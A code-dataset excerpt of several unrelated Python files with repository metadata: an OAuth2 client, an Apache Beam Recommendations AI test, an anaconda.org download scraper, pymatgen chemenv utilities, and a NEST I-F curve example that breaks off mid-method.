            # expired: refresh it and retry the request once.
            if 'error' not in response.text:
                self.request_auth_with_refresh_token()
                response = super(OAuth2ResourceOwner, self) \
                    .make_request(end_point, end_point_vars, params)
            else:
                raise requests.exceptions.HTTPError(response.text)

        response.raise_for_status()
        return response

    def get_tokens(self):
        """Get dictionary of tokens"""
        token_data = {
            'access_token': self.access_token,
            'refresh_token': self.refresh_token
        }
        return token_data

    def set_tokens(self, token_data):
        """Set the cached tokens from a dictionary of access/refresh tokens"""
        self._refresh_auth_state(token_data)

    def _refresh_auth_state(self, tokens):
        """Refresh the access tokens used to authenticate requests

        :param tokens: dict containing the access_tokens
        """
        self.access_token = tokens['access_token']
        self.refresh_token = tokens['refresh_token']
        # Re-bind the session auth so subsequent requests carry the new token.
        self.session.auth = OAuth2Tokens(self.access_token)
class OAuth2Tokens(requests.auth.AuthBase):
    """requests auth hook that injects an OAuth2 access token.

    When attached to a session, every outgoing request gets the token
    appended to its JSON body.

    :param token: access token used with the resource request
    """
    def __init__(self, token):
        self.token = token

    def __call__(self, r):
        # Decode the JSON body, add the access token, and re-encode it.
        payload = json.loads(r.body)
        payload['access_token'] = self.token
        r.body = json.dumps(payload)
        return r
| samueljackson92/CSAlumni-client | csa_client/oauth.py | Python | mit | 4,438 | [
"ASE"
] | 2743659c959a9f5ba6165db6bf6221e52b4e6904524578c34604abdaf1b60d5d |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Integration tests for Recommendations AI transforms."""
from __future__ import absolute_import
import random
import unittest
from nose.plugins.attrib import attr
import apache_beam as beam
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.testing.util import is_not_empty
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud import recommendationengine
from apache_beam.ml.gcp import recommendations_ai
except ImportError:
recommendationengine = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
GCP_TEST_PROJECT = 'apache-beam-testing'
def extract_id(response):
  """Yield the ``id`` field of a catalog-item *response* dict."""
  item_id = response["id"]
  yield item_id
def extract_event_type(response):
  """Yield the ``event_type`` field of a user-event *response* dict."""
  event = response["event_type"]
  yield event
def extract_prediction(response):
  """Yield the ``results`` list from the first element of *response*."""
  first = response[0]
  yield first["results"]
@attr('IT')
@unittest.skipIf(
    recommendationengine is None,
    "Recommendations AI dependencies not installed.")
class RecommendationAIIT(unittest.TestCase):
  """Integration tests for the Recommendations AI Beam transforms.

  Each test runs a small TestPipeline against the shared
  ``apache-beam-testing`` GCP project and asserts on the transform output.
  """
  def test_create_catalog_item(self):
    """CreateCatalogItem should echo back the id of the stored item."""
    # Random id so repeated runs do not collide in the shared catalog.
    CATALOG_ITEM = {
        "id": str(int(random.randrange(100000))),
        "title": "Sample laptop",
        "description": "Indisputably the most fantastic laptop ever created.",
        "language_code": "en",
        "category_hierarchies": [{
            "categories": ["Electronic", "Computers"]
        }]
    }
    with TestPipeline(is_integration_test=True) as p:
      output = (
          p | 'Create data' >> beam.Create([CATALOG_ITEM])
          | 'Create CatalogItem' >>
          recommendations_ai.CreateCatalogItem(project=GCP_TEST_PROJECT)
          | beam.ParDo(extract_id) | beam.combiners.ToList())
      assert_that(output, equal_to([[CATALOG_ITEM["id"]]]))

  def test_create_user_event(self):
    """WriteUserEvent should echo back the event_type of the written event."""
    USER_EVENT = {"event_type": "page-visit", "user_info": {"visitor_id": "1"}}
    with TestPipeline(is_integration_test=True) as p:
      output = (
          p | 'Create data' >> beam.Create([USER_EVENT]) | 'Create UserEvent' >>
          recommendations_ai.WriteUserEvent(project=GCP_TEST_PROJECT)
          | beam.ParDo(extract_event_type) | beam.combiners.ToList())
      assert_that(output, equal_to([[USER_EVENT["event_type"]]]))

  def test_predict(self):
    """PredictUserEvent should return a non-empty prediction result."""
    USER_EVENT = {"event_type": "page-visit", "user_info": {"visitor_id": "1"}}
    with TestPipeline(is_integration_test=True) as p:
      output = (
          p | 'Create data' >> beam.Create([USER_EVENT])
          | 'Predict UserEvent' >> recommendations_ai.PredictUserEvent(
              project=GCP_TEST_PROJECT, placement_id="recently_viewed_default")
          | beam.ParDo(extract_prediction))
      assert_that(output, is_not_empty())
| lukecwik/incubator-beam | sdks/python/apache_beam/ml/gcp/recommendations_ai_test_it.py | Python | apache-2.0 | 3,665 | [
"VisIt"
] | 2e04da736e0f54e64d56fa4f25a66e8f33c40d374fc4f9346274e44866f42f65 |
# coding: utf-8
# In[1]:
from __future__ import print_function
name = '2018-05-29-scrape_binstar'
title = "Binstar/conda package stats"
import os
from datetime import datetime
#from IPython.core.display import HTML
# with open('creative_commons.txt', 'r') as f:
# html = f.read()
# html = '''
# <small>
# <p> This post was written as an IPython notebook.
# It is available for <a href='https://ocefpaf.github.com/python4oceanographers/downloads/notebooks/%s.ipynb'>download</a>
# or as a static <a href='https://nbviewer.ipython.org/url/ocefpaf.github.com/python4oceanographers/downloads/notebooks/%s.ipynb'>html</a>.</p>
# <p></p>
# %s''' % (name, name, html)
#get_ipython().magic(u'matplotlib inline')
from matplotlib import style
style.use('ggplot')
hour = datetime.utcnow().strftime('%H:%M')
comments="true"
date = '-'.join(name.split('-')[:3])
slug = '-'.join(name.split('-')[3:])
metadata = dict(title=title,
date=date,
hour=hour,
comments=comments,
slug=slug,
name=name)
markdown = """Title: {title}
date: {date} {hour}
comments: {comments}
slug: {slug}
{{% notebook {name}.ipynb cells[1:] %}}
""".format(**metadata)
# content = os.path.abspath(os.path.join(os.getcwd(), os.pardir, os.pardir, '{}.md'.format(name)))
# with open('{}'.format(content), 'w') as f:
# f.writelines(markdown)
# [Conda](http://conda.pydata.org/docs/intro.html) and
# [binstar](https://binstar.org/) are changing the packaging world of Python.
# Conda made it easy to install re-locatable python binaries that where hard
# to build, while binstar provides a "Linux repository-like system"
# (or if you are younger than me an AppStore-like system) to host custom binaries.
#
# Taking advantage of that [IOOS](http://www.ioos.noaa.gov/) created a binstar
# [channel](https://binstar.org/ioos) with Met-ocean themed packages for Windows,
# Linux and MacOS. Note that, if you are using Red Hat Enterprise Linux or Centos you
# should use the [rhel6 channel](https://binstar.org/ioos-rhel6) to avoid the
# [GLIBC problem](https://groups.google.com/a/continuum.io/forum/#!topic/conda/_MGxU8vOBPw).
#
# All the conda-recipes are open and kept in a GitHub
# [repository](https://github.com/ioos/conda-recipes). (And accepting PRs ;-)
#
# In this post I will not show how to install and configure conda with this channel.
# It has been done already [here](https://ocefpaf.github.io/python4oceanographers/blog/2014/06/23/virtual_env/)
# and
# [here](https://github.com/ioos/conda-recipes/wiki). Is this post I will scrape
# the binstar channel stats to evaluate how the channel is doing.
# First some handy functions to parse the dates, the package names, and
# to same all the data into a pandas DataFrame.
# In[2]:
import re
import requests
import numpy as np
from datetime import date
from pandas import DataFrame
from bs4 import BeautifulSoup
from dateutil.relativedelta import relativedelta
def todatetime(ul_str):
    """Turn an anaconda.org 'N years and M months ... ago' string into a date."""
    upload = re.compile(r'((?P<year>\d+) years?)?( and )?((?P<month>\d+) months?)?( and )?((?P<day>\d+) days?)?( and )?((?P<hour>\d+) hours?)?( and )?((?P<min>\d+) minutes?)?(.*)ago')
    mobj = upload.match(ul_str)
    if not mobj:
        raise ValueError("Unexpected period {!r}".format(ul_str))
    # Every unit is optional in the pattern; missing groups count as zero.
    parts = {}
    for unit in ('year', 'month', 'day', 'hour', 'min'):
        value = mobj.group(unit)
        parts[unit] = int(value) if value else 0
    delta = relativedelta(years=parts['year'], months=parts['month'],
                          days=parts['day'], hours=parts['hour'],
                          minutes=parts['min'])
    return date.today() - delta
def parse_name(cell):
    """Split a listing-table cell into (platform, package file stem).

    The cell text looks like '<label> <platform>/<name>.tar.bz2'; Windows
    listings use a backslash separator instead of a slash.
    """
    pieces = cell.text.strip().split('/')
    if len(pieces) != 2:
        # Fall back to the Windows-style separator.
        pieces = cell.text.strip().split('\\')
    arch = '{}'.format(pieces[0].split()[1])
    name = '{}'.format(pieces[1].split('.tar.bz2')[0])
    return arch, name
def get_page(package, page):
    """Scrape one anaconda.org file-listing page for *package*.

    Returns four parallel lists: download counts, upload dates, platforms
    and package file names, one entry per file row on the page.
    """
    url = "https://anaconda.org/psi4/{}/files?page={}".format
    r = requests.get(url(package, page))
    r.raise_for_status()
    soup = BeautifulSoup(r.text, "html5lib")
    table = soup.find("table", class_="full-width")
    downloads, uploaded, platforms, names = [], [], [], []
    for row in table.findAll('tr'):
        col = row.findAll('td')
        #print('COL: ', col)
        # Data rows have exactly 8 cells; header/summary rows are skipped.
        if len(col) == 8:
            downloads.append(int(col[6].text.strip()))
            uploaded.append(todatetime(col[4].text.strip()))
            platform, name = parse_name(col[3])
            platforms.append(platform)
            names.append(name)
            #print downloads[-1], uploaded[-1], platforms[-1], names[-1]
    return downloads, uploaded, platforms, names
def get_df(package):
    """Collect every listing page for *package* into a time-indexed DataFrame.

    Pages are fetched until one returns fewer than 50 rows (the page size);
    if 14 full pages are read the loop's ``else`` branch warns that counts
    may be inflated.
    """
    all_downloads = []
    all_uploaded = []
    all_platforms = []
    all_names = []
    for page in range(1, 15):
        dn, up, pf, nm = get_page(package, page)
        print(len(nm), end=' ')
        all_downloads.extend(dn)
        all_uploaded.extend(up)
        all_platforms.extend(pf)
        all_names.extend(nm)
        if len(nm) != 50:
            break
    else:
        print("Insufficient pages or packages in multiple of 50 which may lead to inflated download counts.")
    frame = DataFrame(data=n.c_[all_platforms, all_names, all_uploaded, all_downloads],
                      columns=['platform', 'name', 'uploaded', 'downloads'])
    # n.c_ coerces everything to strings, so restore the proper dtypes.
    frame['uploaded'] = pd.to_datetime(frame['uploaded'])
    frame.set_index('uploaded', inplace=True, drop=True)
    frame['downloads'] = frame['downloads'].astype(int)
    return frame
# All the data we need is in the `repodata.json` file. There isn't an API
# to access that via the command line (yet), that is why we need to scrape
# it.
# In[3]:
from requests import HTTPError
from pandas import Panel, read_json
import pandas as pd
# Widen pandas' display limits so whole tables print without truncation.
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 5000)
pd.set_option('display.width', 1000)
# NOTE(review): this name shadows the stdlib "json" module for the rest of
# the script (harmless here, the module is not used afterwards).
json = "https://conda.anaconda.org/psi4/linux-64/repodata.json"
df = read_json(json)
# Derive package names by stripping the trailing "-<version>-<build>" parts
# of the repodata entries ...
packages = sorted(set(['-'.join(pac.split('-')[:-2]) for pac in df.index]))
packages = [pkg for pkg in packages if pkg]
# ... then override with a hand-curated list.
packages = [u'psi4', u'chemps2', u'dftd3', u'pcmsolver', u'v2rdm_casscf', u'libint', u'erd', u'simint', u'dkh', u'gdma', u'gcp', u'libefp', 'libxc']
dfs = dict()
# Scrape the per-package download tables; skip packages whose pages fail.
for pac in packages:
    try:
        print('\n', pac, ': ', end='')
        dfs.update({pac: get_df(pac)})
    except HTTPError:
        continue
# Now let's split the various platforms and compute total number of downloads
# for each package.
# In[13]:
def get_plat_total(df):
    """Sum the download counts per platform for uploads up to 2017-05-16.

    *df* must be indexed by upload datetime (as produced by get_df) and
    carry 'platform' and 'downloads' columns. Returns a dict mapping each
    platform label to its total download count. The commented-out slices
    of the original analysis (all-time, pre/post 1.0) were dropped; the
    cutoff below corresponds to the post-1.1 analysis window.
    """
    totals = dict()
    for plat in ['linux-64', 'osx-64']:  # win-32/win-64 intentionally excluded
        # Restrict to uploads up to the cutoff date, then to one platform.
        subset = df.loc[:'2017-5-16'].query('platform == "{}"'.format(plat))
        print(subset)  # nicely formatted output
        totals[plat] = subset.sum()['downloads']
    return totals
# Aggregate per-platform download totals for every scraped package.
# NOTE(review): "packages" is rebound here from the earlier list of names to
# a dict of totals.
packages = dict()
for pac in dfs.keys():
    df = dfs[pac]
    packages.update({pac: get_plat_total(df)})
# Print an aligned summary: per-platform counts and their sum.
for pac in dfs.keys():
    print('{:<15}: {:<10} {:<6} {:<10} {:<6} {:<10} {:<6}'.format(pac,
          'linux-64', packages[pac]['linux-64'],
          'osx-64', packages[pac]['osx-64'],
          'total', packages[pac]['linux-64'] + packages[pac]['osx-64']))
| psi4/psi4meta | download-analysis/conda/anaconda_dot_org_scraper.py | Python | gpl-2.0 | 7,714 | [
"Psi4"
] | 616ec3c7651f8d3745453551b93ab9841f7bf90691e8d84c6d37a1e05ecfa919 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
from pymatgen.ext.matproj import MPRester
from pymatgen.io.cif import CifParser
try:
import vtk
from pymatgen.vis.structure_vtk import StructureVis
no_vis = False
except ImportError:
StructureVis = None
no_vis = True
try:
input = raw_input
except NameError:
pass
from pymatgen.core.sites import PeriodicSite
import re
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import UNCLEAR_ENVIRONMENT_SYMBOL
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import LocalGeometryFinder
from pymatgen.analysis.chemenv.utils.chemenv_errors import NeighborsNotComputedChemenvError
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import AbstractGeometry
from pymatgen.analysis.chemenv.utils.coordination_geometry_utils import rotateCoords
from pymatgen.analysis.chemenv.utils.defs_utils import chemenv_citations
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import SimplestChemenvStrategy
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import SimpleAbundanceChemenvStrategy
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import TargettedPenaltiedAbundanceChemenvStrategy
from pymatgen.core.structure import Molecule
from collections import OrderedDict
import numpy as np
"""
This module contains some utils for the main script of the chemenv package.
"""
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__credits__ = "Geoffroy Hautier"
__version__ = "2.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "Feb 20, 2016"
# Registry mapping strategy names (as stored in the chemenv configuration)
# to their classes; an OrderedDict preserves the declaration order.
strategies_class_lookup = OrderedDict()
strategies_class_lookup['SimplestChemenvStrategy'] = SimplestChemenvStrategy
strategies_class_lookup['SimpleAbundanceChemenvStrategy'] = SimpleAbundanceChemenvStrategy
strategies_class_lookup['TargettedPenaltiedAbundanceChemenvStrategy'] = TargettedPenaltiedAbundanceChemenvStrategy
def _draw_perfect_cg(vis, cg, csm_info, csm_suffix, perf_radius):
    """Overlay the perfect (model) coordination geometry on the visualization.

    The model points of *cg* are rotated, scaled and translated using the
    symmetry-measure data stored in *csm_info* for the given *csm_suffix*,
    then drawn as red edges with black spheres at the vertices.
    """
    perfect_geometry = AbstractGeometry.from_cg(cg)
    trans = csm_info['other_symmetry_measures']['translation_vector_{}'.format(csm_suffix)]
    rot = csm_info['other_symmetry_measures']['rotation_matrix_{}'.format(csm_suffix)]
    scale = csm_info['other_symmetry_measures']['scaling_factor_{}'.format(csm_suffix)]
    points = perfect_geometry.points_wcs_ctwcc()
    rotated_points = rotateCoords(points, rot)
    points = [scale * pp + trans for pp in rotated_points]
    if 'wcs' in csm_suffix:
        # "with central site": the first point is the central site, which is
        # not part of the edge framework.
        ef_points = points[1:]
    else:
        ef_points = points
    edges = cg.edges(ef_points, input='coords')
    vis.add_edges(edges, color=[1.0, 0.0, 0.0])
    for point in points:
        vis.add_partial_sphere(coords=point, radius=perf_radius, color=[0.0, 0.0, 0.0],
                               start=0, end=360, opacity=1)


def draw_cg(vis, site, neighbors, cg=None, perm=None, perfect2local_map=None,
            show_perfect=False, csm_info=None, symmetry_measure_type='csm_wcs_ctwcc', perfect_radius=0.1,
            show_distorted=True, faces_color_override=None):
    """Draw a coordination environment (sites, bonds, faces, edges) in *vis*.

    :param vis: StructureVis instance to draw into.
    :param site: central site of the environment.
    :param neighbors: neighbor sites of the environment.
    :param cg: coordination geometry used to build faces/edges (required when
        more than two neighbors are present or when show_perfect is True).
    :param perm: permutation mapping model points to neighbors (exclusive
        with perfect2local_map).
    :param perfect2local_map: mapping of model points to neighbors (exclusive
        with perm).
    :param show_perfect: also overlay the perfect model geometry (requires
        csm_info).
    :param csm_info: symmetry-measure data used to place the perfect geometry.
    :param symmetry_measure_type: which symmetry measure to use; its suffix
        (after the 'csm_' prefix) selects the stored translation/rotation/scale.
    :param perfect_radius: radius parameter for the perfect-geometry spheres.
    :param show_distorted: draw the actual (distorted) environment.
    :param faces_color_override: color used for faces instead of the element
        color of the central site.
    :raises ValueError: if show_perfect without csm_info, or if both perm and
        perfect2local_map are given.
    """
    if show_perfect:
        if csm_info is None:
            raise ValueError('Not possible to show perfect environment without csm_info')
        csm_suffix = symmetry_measure_type[4:]
        # NOTE(review): with the default perfect_radius=0.1 this evaluates to
        # -50; the scaling looks odd — confirm the intended formula.
        perf_radius = (perfect_radius - 0.2) / 0.002
    if perm is not None and perfect2local_map is not None:
        raise ValueError('Only "perm" or "perfect2local_map" should be provided in draw_cg, not both')
    if show_distorted:
        vis.add_bonds(neighbors, site)
        for n in neighbors:
            vis.add_site(n)
    if len(neighbors) < 3:
        # Too few neighbors to define polyhedron faces: draw thick green
        # bonds instead.
        if show_distorted:
            vis.add_bonds(neighbors, site, color=[0.0, 1.0, 0.0], opacity=0.4, radius=0.175)
        if show_perfect and len(neighbors) == 2:
            _draw_perfect_cg(vis, cg, csm_info, csm_suffix, perf_radius)
    else:
        if show_distorted:
            if perm is not None:
                faces = cg.faces(neighbors, permutation=perm)
                edges = cg.edges(neighbors, permutation=perm)
            elif perfect2local_map is not None:
                faces = cg.faces(neighbors, perfect2local_map=perfect2local_map)
                edges = cg.edges(neighbors, perfect2local_map=perfect2local_map)
            else:
                faces = cg.faces(neighbors)
                edges = cg.edges(neighbors)
            symbol = list(site.species_and_occu.keys())[0].symbol
            if faces_color_override:
                mycolor = faces_color_override
            else:
                mycolor = [float(i) / 255 for i in vis.el_color_mapping[symbol]]
            vis.add_faces(faces, mycolor, opacity=0.4)
            vis.add_edges(edges)
        if show_perfect:
            _draw_perfect_cg(vis, cg, csm_info, csm_suffix, perf_radius)
# Visualizing a coordination geometry
def visualize(cg, zoom=None, vis=None, myfactor=1.0, view_index=True, faces_color_override=None):
    """Visualize a coordination geometry as a dummy molecule.

    The environment is rendered with a Cu atom at the central site and O
    atoms at the neighbor positions.

    :param cg: coordination geometry to display.
    :param zoom: camera zoom factor (applied when not None).
    :param vis: existing StructureVis to draw into; a new one is created
        when None.
    :param myfactor: scaling factor applied to all coordinates.
    :param view_index: when True, label each neighbor with its index.
    :param faces_color_override: forwarded to draw_cg to force the face color.
    :return: the StructureVis instance used for drawing.
    """
    if vis is None:
        vis = StructureVis(show_polyhedron=False, show_unit_cell=False)
    myspecies = ["O"] * (cg.coordination_number+1)
    myspecies[0] = "Cu"
    # Bugfix: np.float was deprecated in numpy 1.20 and removed in 1.24; it
    # was a plain alias of the builtin float, which is used here instead.
    coords = [np.zeros(3, float) + cg.central_site]
    for pp in cg.points:
        coords.append(np.array(pp) + cg.central_site)
    coords = [cc * myfactor for cc in coords]
    structure = Molecule(species=myspecies, coords=coords)
    vis.set_structure(structure=structure, reset_camera=True)
    draw_cg(vis, site=structure[0], neighbors=structure[1:], cg=cg, faces_color_override=faces_color_override)
    if view_index:
        for ineighbor, neighbor in enumerate(structure[1:]):
            vis.add_text(neighbor.coords, '{}'.format(ineighbor), color=(0, 0, 0))
    if zoom is not None:
        vis.zoom(zoom)
    return vis
def welcome(chemenv_config):
    """Print the ChemEnv greeting banner, citations and package options."""
    banner = (
        'Chemical Environment package (ChemEnv)',
        chemenv_citations(),
        chemenv_config.package_options_description(),
    )
    for line in banner:
        print(line)
def thankyou():
    """Print the ChemEnv farewell message and the citation reminder."""
    for message in ('Thank you for using the ChemEnv package',
                    chemenv_citations()):
        print(message)
def compute_environments(chemenv_configuration):
    """Interactive command-line loop computing coordination environments.

    Repeatedly asks the user for a structure (from a cif file or, when
    Materials Project access is configured, from the MP database), computes
    its structure environments with a LocalGeometryFinder, and prints — and
    optionally visualizes — the coordination environments determined by the
    configured strategy.
    """
    # Raw strings avoid invalid-escape warnings for the regex patterns
    # (values are unchanged).
    string_sources = {'cif': {'string': 'a Cif file', 'regexp': r'.*\.cif$'},
                      'mp': {'string': 'the Materials Project database', 'regexp': r'mp-[0-9]+$'}}
    questions = {'c': 'cif'}
    if chemenv_configuration.has_materials_project_access:
        questions['m'] = 'mp'
    lgf = LocalGeometryFinder()
    lgf.setup_parameters()
    allcg = AllCoordinationGeometries()
    strategy_class = strategies_class_lookup[chemenv_configuration.package_options['default_strategy']['strategy']]
    #TODO: Add the possibility to change the parameters and save them in the chemenv_configuration
    default_strategy = strategy_class()
    default_strategy.setup_options(chemenv_configuration.package_options['default_strategy']['strategy_options'])
    max_dist_factor = chemenv_configuration.package_options['default_max_distance_factor']
    firsttime = True
    while True:
        if len(questions) > 1:
            found = False
            print('Enter the source from which the structure is coming or <q> to quit :')
            for key_character, qq in questions.items():
                print(' - <{}> for a structure from {}'.format(key_character, string_sources[qq]['string']))
            test = input(' ... ')
            if test == 'q':
                break
            if test not in list(questions.keys()):
                # The user may have typed the source itself (file path or
                # mp id) instead of a menu key: try to recognize it directly.
                for key_character, qq in questions.items():
                    if re.match(string_sources[qq]['regexp'], str(test)) is not None:
                        found = True
                        source_type = qq
                if not found:
                    print('Wrong key, try again ...')
                    continue
            else:
                source_type = questions[test]
        else:
            found = False
            source_type = list(questions.values())[0]
        if found and len(questions) > 1:
            input_source = test
        if source_type == 'cif':
            if not found:
                input_source = input('Enter path to cif file : ')
            cp = CifParser(input_source)
            structure = cp.get_structures()[0]
        elif source_type == 'mp':
            if not found:
                input_source = input('Enter materials project id (e.g. "mp-1902") : ')
            a = MPRester()
            structure = a.get_structure_by_material_id(input_source)
        lgf.setup_structure(structure)
        print('Computing environments for {} ... '.format(structure.composition.reduced_formula))
        se = lgf.compute_structure_environments(maximum_distance_factor=max_dist_factor)
        print('Computing environments finished')
        while True:
            test = input('See list of environments determined for each (unequivalent) site ? '
                         '("y" or "n", "d" with details, "g" to see the grid) : ')
            strategy = default_strategy
            if test in ['y', 'd', 'g']:
                strategy.set_structure_environments(se)
                for eqslist in se.equivalent_sites:
                    site = eqslist[0]
                    isite = se.structure.index(site)
                    try:
                        if strategy.uniquely_determines_coordination_environments:
                            ces = strategy.get_site_coordination_environments(site)
                        else:
                            ces = strategy.get_site_coordination_environments_fractions(site)
                    except NeighborsNotComputedChemenvError:
                        continue
                    if ces is None:
                        continue
                    if len(ces) == 0:
                        continue
                    comp = site.species_and_occu
                    #ce = strategy.get_site_coordination_environment(site)
                    if strategy.uniquely_determines_coordination_environments:
                        ce = ces[0]
                        if ce is None:
                            continue
                        thecg = allcg.get_geometry_from_mp_symbol(ce[0])
                        mystring = 'Environment for site #{} {} ({}) : {} ({})\n'.format(str(isite),
                                                                                        comp.get_reduced_formula_and_factor()[0],
                                                                                        str(comp),
                                                                                        thecg.name,
                                                                                        ce[0])
                    else:
                        mystring = 'Environments for site #{} {} ({}) : \n'.format(str(isite),
                                                                                   comp.get_reduced_formula_and_factor()[0],
                                                                                   str(comp))
                        for ce in ces:
                            cg = allcg.get_geometry_from_mp_symbol(ce[0])
                            csm = ce[1]['other_symmetry_measures']['csm_wcs_ctwcc']
                            mystring += ' - {} ({}): {:.2f} % (csm : {:2f})\n'.format(cg.name, cg.mp_symbol,
                                                                                     100.0*ce[2],
                                                                                     csm)
                    if test in ['d', 'g'] and strategy.uniquely_determines_coordination_environments:
                        if thecg.mp_symbol != UNCLEAR_ENVIRONMENT_SYMBOL:
                            mystring += ' <Continuous symmetry measures> '
                            mingeoms = se.ce_list[isite][thecg.coordination_number][0].minimum_geometries()
                            for mingeom in mingeoms:
                                csm = mingeom[1]['other_symmetry_measures']['csm_wcs_ctwcc']
                                mystring += '{} : {:.2f} '.format(mingeom[0], csm)
                    print(mystring)
            if test == 'g':
                test = input('Enter index of site(s) for which you want to see the grid of parameters : ')
                indices = list(map(int, test.split()))
                print(indices)
                for isite in indices:
                    se.plot_environments(isite, additional_condition=se.AC.ONLY_ACB)
            if no_vis:
                # vtk is not available: skip the visualization questions.
                test = input('Go to next structure ? ("y" to do so)')
                if test == 'y':
                    break
                continue
            test = input('View structure with environments ? ("y" for the unit cell or "m" for a supercell or "n") : ')
            if test in ['y', 'm']:
                if test == 'm':
                    mydeltas = []
                    test = input('Enter multiplicity (e.g. 3 2 2) : ')
                    nns = test.split()
                    for i0 in range(int(nns[0])):
                        for i1 in range(int(nns[1])):
                            for i2 in range(int(nns[2])):
                                # Bugfix: np.float was removed from numpy
                                # (deprecated 1.20, removed 1.24); the builtin
                                # float is the exact replacement.
                                mydeltas.append(np.array([1.0*i0, 1.0*i1, 1.0*i2], float))
                else:
                    mydeltas = [np.zeros(3, float)]
                if firsttime:
                    vis = StructureVis(show_polyhedron=False, show_unit_cell=True)
                    vis.show_help = False
                    firsttime = False
                vis.set_structure(se.structure)
                strategy.set_structure_environments(se)
                for isite, site in enumerate(se.structure):
                    try:
                        ces = strategy.get_site_coordination_environments(site)
                    except NeighborsNotComputedChemenvError:
                        continue
                    if len(ces) == 0:
                        continue
                    ce = strategy.get_site_coordination_environment(site)
                    if ce is not None and ce[0] != UNCLEAR_ENVIRONMENT_SYMBOL:
                        for mydelta in mydeltas:
                            psite = PeriodicSite(site._species, site._fcoords + mydelta, site._lattice,
                                                 properties=site._properties)
                            vis.add_site(psite)
                            neighbors = strategy.get_site_neighbors(psite)
                            draw_cg(vis, psite, neighbors, cg=lgf.allcg.get_geometry_from_mp_symbol(ce[0]),
                                    perm=ce[1]['permutation'])
                vis.show()
            test = input('Go to next structure ? ("y" to do so) : ')
            if test == 'y':
                break
        print('')
| Bismarrck/pymatgen | pymatgen/analysis/chemenv/utils/scripts_utils.py | Python | mit | 16,162 | [
"VTK",
"pymatgen"
] | 9b0e8d4b79d9cbab4f90158b20801a9f40f1e47303d1f0b5dd1ae0ead70b40fe |
# -*- coding: utf-8 -*-
#
# if_curve.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""IF curve example
----------------------
This example illustrates how to measure the I-F curve of a neuron.
The program creates a small group of neurons and injects a noisy current
:math:`I(t) = I_mean + I_std*W(t)`
where :math:`W(t)` is a white noise process.
The program systematically drives the current through a series of values in
the two-dimensional `(I_mean, I_std)` space and measures the firing rate of
the neurons.
In this example, we measure the I-F curve of the adaptive exponential
integrate and fire neuron (``aeif_cond_exp``), but any other neuron model that
accepts current inputs is possible. The model and its parameters are
supplied when the IF_curve object is created.
"""
import numpy
import nest
import shelve
###############################################################################
# Here we define which model and the neuron parameters to use for measuring
# the transfer function.
model = 'aeif_cond_exp'
# AdEx neuron parameters (NEST conventions; see the aeif_cond_exp model
# documentation for the parameter meanings and default units).
params = {'a': 4.0,          # subthreshold adaptation
          'b': 80.8,         # spike-triggered adaptation increment
          'V_th': -50.4,     # spike initiation threshold
          'Delta_T': 2.0,    # slope factor of the exponential term
          'I_e': 0.0,        # constant external input current
          'C_m': 281.0,      # membrane capacitance
          'g_L': 30.0,       # leak conductance
          'V_reset': -70.6,  # reset potential after a spike
          'tau_w': 144.0,    # adaptation time constant
          't_ref': 5.0,      # refractory period
          'V_peak': -40.0,   # spike detection threshold
          'E_L': -70.6,      # leak reversal potential
          'E_ex': 0.,        # excitatory reversal potential
          'E_in': -70.}      # inhibitory reversal potential
class IF_curve():
    """Measure the I-F transfer function of a neuron model.

    A population of `n_neurons` neurons is driven by a noisy current and the
    population-averaged firing rate is recorded for every combination of the
    current mean and standard deviation.
    """

    # NOTE(review): t_inter_trial is not referenced anywhere in this class —
    # confirm whether inter-trial pauses were intended.
    t_inter_trial = 200. # Interval between two successive measurement trials
    t_sim = 1000. # Duration of a measurement trial
    n_neurons = 100 # Number of neurons
    n_threads = 4 # Number of threads to run the simulation
    def __init__(self, model, params=False):
        """Store the model name and parameters and build the network.

        `params` may be a dict of model parameters or False (the falsy
        sentinel) to keep the model defaults.
        """
        self.model = model
        self.params = params
        self.build()
        self.connect()
    def build(self):
        """Reset the NEST kernel and create neurons and devices."""
        #######################################################################
        # We reset NEST to delete information from previous simulations
        # and adjust the number of threads.
        nest.ResetKernel()
        nest.SetKernelStatus({'local_num_threads': self.n_threads})
        #######################################################################
        # We set the default parameters of the neuron model to those
        # defined above and create neurons and devices.
        if self.params:
            nest.SetDefaults(self.model, self.params)
        self.neuron = nest.Create(self.model, self.n_neurons)
        self.noise = nest.Create('noise_generator')
        self.spike_recorder = nest.Create('spike_recorder')
    def connect(self):
        """Wire the noise generator to the neurons and the neurons to the recorder."""
        #######################################################################
        # We connect the noisy current to the neurons and the neurons to
        # the spike recorders.
        nest.Connect(self.noise, self.neuron, 'all_to_all')
